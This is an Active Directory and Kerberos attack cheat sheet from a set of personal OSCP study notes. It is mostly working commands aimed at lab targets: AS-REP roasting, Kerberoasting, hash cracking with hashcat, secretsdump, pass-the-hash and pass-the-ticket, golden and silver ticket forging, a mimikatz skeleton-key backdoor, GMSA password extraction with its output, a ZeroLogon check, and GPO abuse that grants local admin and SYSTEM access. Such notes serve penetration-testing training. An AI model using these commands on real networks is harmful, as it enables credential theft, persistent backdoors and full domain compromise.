Offensive Security Notes
  • OSCP Checklist
    • Privilege Escalation Windows
  • Menu
    • Services
      • Remote Desktop (RDP) (3389)
      • FTP (21)
      • Telnet (23)
      • SMTP (25)
      • HTTP/HTTPS (80/443)
        • OWASP TOP 10 (2017)
      • Kerberos (88) / Active Directory (AD)
      • NetBIOS (139)
      • Samba / SMB (445)
      • IMAP (143/993)
      • MySQL / MariaDB (3389)
      • PostgreSQL (5432)
    • Vulnerability Methods
      • Padding Oracle Attack
      • Unsecure JSON Web Token (JWT)
      • XXE (XML External Entity)
      • LFI / RFI (Local / Remote File Inclusion)
      • CSRF (Cross-Site Request Forgery)
      • Session Fixation
      • SSRF (Server-Side Request Forgery)
      • Wildcard Injection
    • Tools of the Trade
      • powershell
      • hashcat
      • responder
      • OWASP Favicon DB
      • misc
      • meterpreter
      • Bloodhound
      • powerview
      • redis
      • wpscan
      • cewl
    • Walkthroughs
      • Try Hack Me
        • Attacktive Directory
      • OSCP Practice
        • Vector
        • Vault
        • QuarterJack
        • PayDay
        • Pelican
        • Postfish
        • Readys
Powered by GitBook
On this page
  • Active Directory Exploitation Cheat Sheet
  • Enumeration
  • AD LDAP enumeration
  • Impacket-GetNPUsers
  • Kerbrute Enumeration - No domain access required
  • impacket-secretsdump - Authenticated user
  • Pass the Hash through Evil-WinRM
  • Pass the Ticket - Access as a user to the domain required
  • Kerberoasting - Access as any user required
  • AS-REP Roasting - Access as any user required
  • Pass the Ticket w/ mimikatz
  • Golden/Silver Ticket Attacks w/ mimikatz
  • Dump all NTLM hashes with mimikatz
  • Kerberos Backdoors w/ mimikatz
  • Exploitation
  • Group Managed Service Accounts (GMSA)
  • ZeroLogon
  • GPO Abuse via SharpGPOAbuse
  1. Menu
  2. Services

Kerberos (88) / Active Directory (AD)

PreviousOWASP TOP 10 (2017)NextNetBIOS (139)

Last updated 3 years ago

Active Directory Exploitation Cheat Sheet

/

Enumeration

AD LDAP enumeration

ldapsearch -x -h $IP -s base # to get the naming context ldapsearch -x -h "192.168.141.122" -b "DC=hutch,DC=offsec" # using naming context found above

Impacket-GetNPUsers

The command below checks for accounts that do not need pre-authentication. Crack them with hashcat.

impacket-GetNPUsers THM-AD/ -usersfile valid_users.txt -dc-ip 10.10.199.242 -format hashcat -outputfile npusers2.hashcat

hashcat -m 18200 -a 0 npusers.hashcat passwordlist.txt

Kerbrute Enumeration - No domain access required

./kerbrute userenum --dc $IP -d $NetbiosDomainName ~/THM/kerbrute-room/users.lst

impacket-secretsdump - Authenticated user

impacket-secretsdump -just-dc THM-AD/backup:backup2517860@10.10.113.122

Pass the Hash through Evil-WinRM

evil-winrm -i 10.10.199.242 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc

Pass the Ticket - Access as a user to the domain required

rubeus.exe harvest /interval:30 (harvest for TGTs every 30 seconds)

Rubeus.exe brute /password:Password1 /noticket

Kerberoasting - Access as any user required

Rubeus Method

Rubeus.exe kerberoast

now that you have some hashes save those into a text file and crack them with hashcat.

hashcat -m 13100 -a 0 hash.txt Pass.txt

Impacket Method

sudo python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py controller.local/Machine1:Password1 -dc-ip 10.10.77.32 -request

AS-REP Roasting - Access as any user required

rubeus.exe asreproast

When adding the hashes to a text file remember to add 23$ after $krb5asrep$ so that the first line will be $krb5asrep$23$User...

hashcat -m 18200 hash.txt pass.txt

Pass the Ticket w/ mimikatz

run mimikatz.exe

run privilege:debug ensure this outputs '20' OK

sekurlsa::tickets /export

Look for a .kirbi file for an account you may already have access such as the 'Adminitrator' account.

Run kerberso:ptt $ticketFile to impersonate the given ticket

Exit mimikatz and run klist to confirm you are using the cached ticket

You should now have Domain Admin rights

Golden/Silver Ticket Attacks w/ mimikatz

  • Golden ticket means that you are able to generate a TGT for any service you want.

    • Full domain compromise (domain admin) required

  • Silver ticket means that you are taking a specific service's TGT and can impersonate it.

    • Service hash required

  • Skeleton Key

    • Full domain compromised (domain admin) required

Run mimikatz

privilege::debug to confirm access

lsadump::lsa /inject /name:krbtgt to dump hashes and other identifiers needed to create a golden ticket. To create a silver ticket you need to change the /name: to dump the hash of either a domain admin account or a service account such as the SQLService account.

You will need to know the user's User ID for the next mimikatz command. You can find this by running the command below (look at the last 3-4 digits).

wmic useraccount where name='%username%' get sid

kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-432953485-3795405108-1502158860 /krbtg t:72cd714611b64cd4d5550cd2759db3f6 /id:500 This is the command for creating a golden ticket; to create a silver ticket simply put a service NTLM hash into the krbtgt slot, the sid of the service account into sid, and change the id to 1103.

misc::cmd this will open a new elevated command prompt with the given ticket in mimikatz. You now have the permissions depending on golden ticket or silver ticket used.

Dump all NTLM hashes with mimikatz

lsadump::lsa /patch

Crack with hashcat -a 0 -O -m 1000 $hash /usr/share/wordlists/rockyou.txt

Kerberos Backdoors w/ mimikatz

misc::skeleton

net use c:\DOMAIN-CONTROLLER\admin$ /user:Administrator mimikatz

dir \Desktop-1\c$ /user:Machine1 mimikatz

Exploitation

Group Managed Service Accounts (GMSA)

Group Managed Service Accounts provide a higher security option for non-interactive applications, services, processes, or tasks that run automatically but need a security credential.

These service accounts are given automatically-generated passwords. Given certain permissions, it is possible to retrieve these password hashes from Active Directory. To see what users or groups have permissions to do that for a given service account, we can look up the PrincipalsAllowedToRetrieveManagedPassword user property on the account.

Get-ADServiceAccount -Identity $serviceAcc -Properties * | Select PrincipalsAllowedToRetrieveManagedPassword

If we have access to an account that is in the same group as the service account then we should be able to extract the password hash of the service account.

*Evil-WinRM* PS C:\Users\enox\Documents> Get-ADServiceAccount -Identity svc_apache -Properties 'msDS-ManagedPassword'


DistinguishedName    : CN=svc_apache,CN=Managed Service Accounts,DC=heist,DC=offsec
Enabled              : True
msDS-ManagedPassword : {1, 0, 0, 0...}
Name                 : svc_apache
ObjectClass          : msDS-GroupManagedServiceAccount
ObjectGUID           : d40bc264-0c4e-4b86-b3b9-b775995ba303
SamAccountName       : svc_apache$
SID                  : S-1-5-21-537427935-490066102-1511301751-1105
UserPrincipalName    :



*Evil-WinRM* PS C:\Users\enox\Documents> $gmsa = Get-ADServiceAccount -Identity 'svc_apache' -Properties 'msDS-ManagedPassword'
*Evil-WinRM* PS C:\Users\enox\Documents> $mp = $gmsa.'msDS-ManagedPassword'
*Evil-WinRM* PS C:\Users\enox\Documents> $mp
1
0
0
0
36
...

Looks like we have the ReadGMSAPassword privilege on the svc_apache account.

*Evil-WinRM* PS C:\Users\enox\Documents> C:/Users/enox/Documents/GMSAPasswordReader.exe --accountname svc_apache
Calculating hashes for Old Value
[*] Input username             : svc_apache$
[*] Input domain               : HEIST.OFFSEC
[*] Salt                       : HEIST.OFFSECsvc_apache$
[*]       rc4_hmac             : EA5055089775D4E018B085C20648D794
[*]       aes128_cts_hmac_sha1 : 4AD57573D862D85482A24107EE8A48AC
[*]       aes256_cts_hmac_sha1 : 8DD276B6CD4EDC9497448ED17FB66842736291C3A109A905C584B84508635795
[*]       des_cbc_md5          : 312FDCDA9DADDCCD

Calculating hashes for Current Value
[*] Input username             : svc_apache$
[*] Input domain               : HEIST.OFFSEC
[*] Salt                       : HEIST.OFFSECsvc_apache$
[*]       rc4_hmac             : DEB6F85CF5EAE0951DD89F4AFD884AE5
[*]       aes128_cts_hmac_sha1 : C5A97007F3CA002059FD8A98962760D0
[*]       aes256_cts_hmac_sha1 : 0DA099CCCBE0C0D6F5EB06E465B7CF05FF069E5E625DD10DA009CA9A795E6E8F
[*]       des_cbc_md5          : 9E340723700454E9

We have the service account password hash and can use this for pass the hash logins (evil-winrm needs the $ sign at the end when logging in with hash).

ZeroLogon

This will break Active Directory so only use it to check if the exploit is possible

python3 zerologon.py -do check -target ATTACKTIVEDIRECT -ip $IP

GPO Abuse via SharpGPOAbuse

If our user has access to the GpoEditDeleteModifySecurity permission then we can give ourselves local administrator privileges. We can confirm this by running Get-NetGPO and running the name GUID string through Get-GPPermission -Guid 31B2F340-016D-11D2-945F-00C04FB984F9 -TargetType User -TargetName anirudh

./SharpGPOAbuse.exe --AddLocalAdmin --UserAccount anirudh --GPOName "Default Domain Policy"

gpupdate /force updates Group Policies

net localgroup Administrators verify we are now in the Administrator group

python3 /usr/share/doc/python3-impacket/examples/psexec.py vault.offsec/anirudh:SecureHM@192.168.120.116 to get SYSTEM access

We can retrieve the password hash with .

S1ckB0y1337
Active-Directory-Exploitation-Cheat-Sheet
GMSAPasswordReader